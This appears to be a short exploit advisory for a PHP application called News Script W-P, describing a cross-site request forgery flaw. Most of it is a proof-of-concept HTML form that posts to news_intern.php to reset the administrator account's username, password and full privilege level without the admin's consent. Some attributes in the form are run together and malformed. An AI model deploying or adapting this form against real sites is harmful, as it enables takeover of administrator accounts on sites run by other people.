< ------------------- header data start ------------------- >
#############################################################

# Application Name :News Script W-P

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin bilgileri degistirebilinir.

# author : Fl0riX - Bug Researchers

# Demo : http://www.web-php.de/demo/100017/event.php

#############################################################
< ------------------- header data end of ------------------- >
<form name=Formular method=post onsubmit=return chkFormular()

action=http://www.site.com/[path]/10003/news_intern.php>
<input type=hidden name=action value=user_anlegen>
<input type=hidden name=senden value=99>
<input type=hidden name=aus value=1>
<input type=hidden name=user_id value=1>
<input type=radio name=userlevel value=0>
<input type=radio name=userlevel value=1 >
<input type=radio name=userlevel value=2 >
<input type=radio name=userlevel value=3checked >Can everything
<input type=text class=input name=username size=30value=admin>
<input type=text class=input name=email size=30value=>
<input class=inputtype=password name=passwort size=30
value=1212124onBlur=if (value ==’’) {value = ’1212124’} onFocus=if (value == ’1212124’) {value =’’} />
<input type=submit class=ab value=fl0baba name=B1>
</form>
< -- bug code end of -- >